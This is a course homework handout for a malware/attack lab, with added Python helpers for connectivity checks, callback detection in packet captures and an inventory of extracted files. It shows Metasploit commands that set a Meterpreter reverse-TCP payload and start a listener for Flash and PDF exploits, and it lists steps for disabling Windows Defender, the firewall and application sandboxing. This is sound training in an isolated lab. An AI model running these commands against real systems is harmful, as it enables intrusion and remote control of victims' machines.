VM Setup, Virtual Networking, Traffic Capture
HW01: VM Setup, Virtual Networking, Traffic Capture
For this homework assignment, you will be expected to build and run an “attack lab” similar to that demonstrated during the Week 1 & 2 lecture sets.
As your assignment submission, you will draft a report that describes the steps taken, the findings (where applicable), and any artifacts produced.
For this lab, you should use either of the following networking approaches for your lab VMs:
- Host-Only Networking
- Internal networking (with a common network name)
Feel free to use NAT in order to get something from the Internet onto your VM; just remember to switch it back to one of the isolated networking methods above before executing an attack.
You will need at least two Virtual Machines running:
- Kali (the VM I distributed for class)
- Windows (you pick the version)
This assignment will involve identifying exploits and directing an attack against Windows VMs, via a Browser-based Adobe Flash exploit as well as a PDF-based exploit. You will select the exploits you wish to use. Note that you may need to experiment with different versions of Windows and applications to achieve success. You may also end up picking a different exploit after initial tries fail. Also, you may find that you cannot use the same version of Windows for both attacks. In this case, feel free to use different versions of Windows for the attacks.
Establish communicating VMs
Configure both of your VMs to run on the same network. You will either need to configure the DHCP server for VirtualBox’s Host-Only networking, or alternatively you may use static IP address assignment.
- Document the process and settings that you used, both inside the VirtualBox application and inside the guest OSes.
- Devise a method to confirm connectivity (that the two VMs can talk to one another), demonstrate it, and document your experience, your findings, and how connectivity was confirmed.
- If not already accomplished in the prior step, demonstrate that you can communicate between the two VMs over a TCP connection.
If you end up having different Windows VMs for your different exploits, then document both of the configurations here. This is the only way I will be able to attempt to recreate your steps.
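One way to confirm connectivity in the direction that matters for the later exercises (Windows VM connecting to the Kali VM), as an added example that is not part of the assignment. It assumes port 4444 is free on Kali and can be self-tested on loopback before it is split across two VMs.

```python
"""Loopback-testable TCP connectivity check for the lab VMs (added example, not
part of the assignment). Run --listen on Kali, then --connect <kali-ip> on
Windows. That direction (Windows -> Kali) is the one reverse_tcp needs later,
so a failure points at the Windows firewall or at VMs on different networks."""
import socket
import sys
import threading

PORT = 4444                            # assumed: same port the handler will use
PROBE = b"lab-connectivity-check\n"    # constructed probe message

def serve_one(bind_ip="0.0.0.0", port=PORT, ready=None):
    """Accept one connection, echo what it sends, return (peer_ip, data)."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((bind_ip, port))
        srv.listen(1)
        if ready is not None:
            ready.set()                # signal "listener is up" to a caller
        conn, (peer_ip, _) = srv.accept()
        with conn:
            data = conn.recv(1024)
            conn.sendall(data)         # echo so the client can verify the round trip
        return peer_ip, data

def probe(target_ip, port=PORT, timeout=5.0):
    """Connect, send the probe, confirm the echo. True only on a full round trip."""
    try:
        with socket.create_connection((target_ip, port), timeout=timeout) as c:
            c.sendall(PROBE)
            return c.recv(1024) == PROBE
    except OSError as exc:             # refused, timed out, unreachable, ...
        print(f"connection to {target_ip}:{port} failed: {exc}")
        return False

def loopback_selftest(port=45444):
    """Run both roles on 127.0.0.1 to check the script before using two VMs."""
    ready, result = threading.Event(), {}
    t = threading.Thread(target=lambda: result.update(r=serve_one("127.0.0.1", port, ready)), daemon=True)
    t.start()
    ready.wait(5)
    ok = probe("127.0.0.1", port)
    t.join(5)
    return ok and result.get("r", (None, None))[1] == PROBE

if __name__ == "__main__":
    if len(sys.argv) == 2 and sys.argv[1] == "--listen":
        print("echoed probe from %s: TCP path to this VM works" % serve_one()[0])
    elif len(sys.argv) == 3 and sys.argv[1] == "--connect":
        print("ok" if probe(sys.argv[2]) else "FAILED")
    else:
        print("self-test on loopback:", loopback_selftest())
```

The peer address printed on the Kali side is worth recording in the report, since it is the same address the handler will later show for an incoming session.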
Unsecuring your VMs
You will need to render your Windows VMs and the applications within them insecure. Some of this was demonstrated in class, but it is left as an exercise for you to make similar configuration changes to any applications and OSes used in this assignment.
- Make sure Windows Defender is disabled (see the linked how-to)
- Disable Windows Firewall, as demonstrated in class
- For Internet Explorer and/or Firefox, you will want to modify the security settings to reduce the security level and disable any “sandbox” features that may be implemented
- For Acrobat Reader, you’ll want to use the settings dialog to change the policy so that the application allows all actions and security is disabled
Launch attack using Flash browser exploit
Choose a Flash exploit to use for launching an attack against a Windows VM. Document how you configured it.
The following command can be run in msfconsole to identify Adobe Flash exploits:
search type:exploit platform:windows adobe_flash
Make sure that you are using the meterpreter reverse shell payload:
set PAYLOAD windows/meterpreter/reverse_tcp
Don’t forget to set your LHOST option, as well as any others, correctly, such as SRVHOST and URIPATH.
Document the steps taken to build your attack.
Extract the files used in your attack (HTML, SWF, etc.), document basic information about them (file sizes, names, URL names, etc.).
You may need to use Wireshark, tcpdump and/or tcpflow to extract these files from an active download.
Launch attack using PDF exploit
Choose a PDF exploit to use for launching an attack against a Windows VM. Document how you configured it.
The following command can be run in msfconsole to identify Adobe Acrobat Reader exploits:
search type:exploit platform:windows acrobat
Make sure that you are using the meterpreter reverse shell payload:
set PAYLOAD windows/meterpreter/reverse_tcp
Don’t forget to set your LHOST option, as well as any others, correctly, such as SRVHOST and URIPATH.
Document the steps taken to build your attack.
Listening for incoming shells
You may run into a situation where Metasploit isn’t actively listening for connections when some PDFs are generated. In this situation, it is necessary to start up the Meterpreter listener yourself:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST (your kali IP)
run
You’ll see a message like the one below, telling you it is working:
[*] Started reverse TCP handler on 192.168.56.101:4444
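The handler message above is the attacker-side view; the same event is visible in the pcap you capture as the Windows VM opening a connection to Kali on the handler port. The following added example (not part of the assignment) walks constructed tcpdump -n style lines and reports each connection the victim initiates, so you can point at the callback when documenting the capture. Addresses, ports and timestamps are assumed.

```python
"""Find the reverse-shell callback in a capture (added example, not part of the
assignment). Walks tcpdump -n style lines and reports every TCP connection the
Windows VM opens itself (a SYN without ACK). A reverse_tcp session appears as
the victim connecting out to LHOST:LPORT (4444 by default) shortly after it
fetched the exploit page or PDF from the same host. Sample lines are constructed."""
import re

LINE = re.compile(
    r"^(?P<ts>\d\d:\d\d:\d\d\.\d+) IP (?P<src>[\d.]+)\.(?P<sport>\d+) > "
    r"(?P<dst>[\d.]+)\.(?P<dport>\d+): Flags \[(?P<flags>[^\]]*)\]"
)

# Constructed: victim 192.168.56.102, Kali 192.168.56.101 serving on 8080, handler on 4444
SAMPLE = """\
12:00:01.100000 IP 192.168.56.102.49712 > 192.168.56.101.8080: Flags [S], seq 1, win 64240, length 0
12:00:01.100500 IP 192.168.56.101.8080 > 192.168.56.102.49712: Flags [S.], seq 2, ack 2, win 65160, length 0
12:00:01.101000 IP 192.168.56.102.49712 > 192.168.56.101.8080: Flags [.], ack 3, win 64240, length 0
12:00:01.120000 IP 192.168.56.102.49712 > 192.168.56.101.8080: Flags [P.], seq 1:80, ack 3, length 79: HTTP: GET /flash HTTP/1.1
12:00:03.400000 IP 192.168.56.102.49713 > 192.168.56.101.4444: Flags [S], seq 9, win 64240, length 0
12:00:03.400400 IP 192.168.56.101.4444 > 192.168.56.102.49713: Flags [S.], seq 10, ack 10, win 65160, length 0
"""

def seconds(ts):
    h, m, s = ts.split(":")
    return int(h) * 3600 + int(m) * 60 + float(s)

def find_callbacks(text, victim, handler_port=4444):
    """Return (timestamp, dst, dport, note) for each connection the victim initiates."""
    findings, first_contact = [], {}       # first_contact: dst host -> time of first SYN
    for line in text.splitlines():
        m = LINE.match(line)
        if not m or m["src"] != victim or m["flags"] != "S":
            continue                       # SYN-ACKs ("S.") and data segments are replies
        t, dst, dport = seconds(m["ts"]), m["dst"], int(m["dport"])
        first_contact.setdefault(dst, t)
        if dport == handler_port:
            note = f"reverse TCP callback to handler, {t - first_contact[dst]:.1f}s after first contact"
        else:
            note = "outbound connection (exploit page / PDF download?)"
        findings.append((m["ts"], dst, dport, note))
    return findings

if __name__ == "__main__":
    for ts, dst, dport, note in find_callbacks(SAMPLE, "192.168.56.102"):
        print(f"{ts} -> {dst}:{dport}  {note}")
```

To use it on your own capture, feed it the output of `tcpdump -n -r attack.pcap` and your Windows VM's address; if you changed LPORT in Metasploit, pass that port as handler_port.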
For both attacks
- Document the steps taken to reduce the security levels on the VM(s) and applications
- Document which modules were employed in Metasploit, and the Metasploit commands used to set up the attack
- Extract the files used in your attack (HTML, SWF, etc.)
- Document basic information about them (file sizes, names, URL names (where appropriate), etc.).
- Use tcpdump, Wireshark, or a similar tool to capture the network traffic of the attack (pcap file)
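For the file-extraction and documentation items (both in the Flash section and in the list above), the following added example (not part of the assignment) takes the bytes of each recovered file and builds the inventory the report asks for: name, size, SHA-256, and a file type taken from the magic bytes rather than from whatever name the server used, plus a count of PDF markers worth noting. The sample files are constructed stand-ins, not exploit content.

```python
"""Inventory of files recovered from the attack traffic (added example, not part
of the assignment). Given the bytes tcpflow or Wireshark's "Export Objects" wrote
out, it records name, size, SHA-256 and the type taken from magic bytes rather
than from the served name, plus PDF markers worth noting in the report."""
import hashlib
import re
import zlib

PDF_MARKERS = (b"/JavaScript", b"/JS", b"/OpenAction", b"/AA", b"/Launch", b"/EmbeddedFile")

def detect_type(data):
    """Classify by leading bytes: %PDF-, FWS/CWS/ZWS (plain/zlib/LZMA Flash), or HTML."""
    if data.startswith(b"%PDF-"):
        return "pdf"
    if data[:3] in (b"FWS", b"CWS", b"ZWS"):
        return "swf"
    if re.match(rb"\s*<(!doctype|html)", data[:64], re.I):
        return "html"
    return "unknown"

def pdf_features(data):
    """Count markers for actions that fire without a click. Zero only means
    'not visible in clear text'; object streams can still hide them."""
    return {m.decode(): len(re.findall(re.escape(m) + rb"\b", data)) for m in PDF_MARKERS}

def describe(name, data):
    info = {"name": name, "size": len(data),
            "sha256": hashlib.sha256(data).hexdigest(), "type": detect_type(data)}
    if info["type"] == "swf":
        info["swf_version"] = data[3]                 # byte 3 is the SWF format version
        info["compressed"] = data[:1] != b"F"         # CWS/ZWS bodies are compressed
        info["declared_size"] = int.from_bytes(data[4:8], "little")  # uncompressed length
    elif info["type"] == "pdf":
        info["features"] = pdf_features(data)
    return info

# Constructed stand-ins for extracted files; not real exploit content.
SAMPLES = {
    "index.html": b"<html><body><object data='x.swf'></object></body></html>",
    "x.swf": b"CWS\x0f" + (72).to_bytes(4, "little") + zlib.compress(b"\x00" * 64),
    "invoice.pdf": (b"%PDF-1.5\n1 0 obj << /Type /Catalog /OpenAction 2 0 R >> endobj\n"
                    b"2 0 obj << /S /JavaScript /JS (app.alert(1)) >> endobj\n%%EOF\n"),
}

def inventory(samples=SAMPLES):
    return [describe(n, d) for n, d in samples.items()]

if __name__ == "__main__":
    for row in inventory(): print(row)
```

Replace SAMPLES with the files you actually carved out of the capture; the sha256 column is what lets the grader match your report against the artifacts in your ZIP.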
Execute a few commands in Meterpreter. What do they return? What is their purpose? Can you upload and download files from the compromised system? Can you execute programs?
Submit your report to the appropriate HW assignment on Blackboard. If you have any supporting program files or artifacts, put them in a ZIP archive and upload that to Blackboard as well. However, upload your finished report unzipped as its own file, so that the in-Blackboard viewer can display it.
tags: malware assignment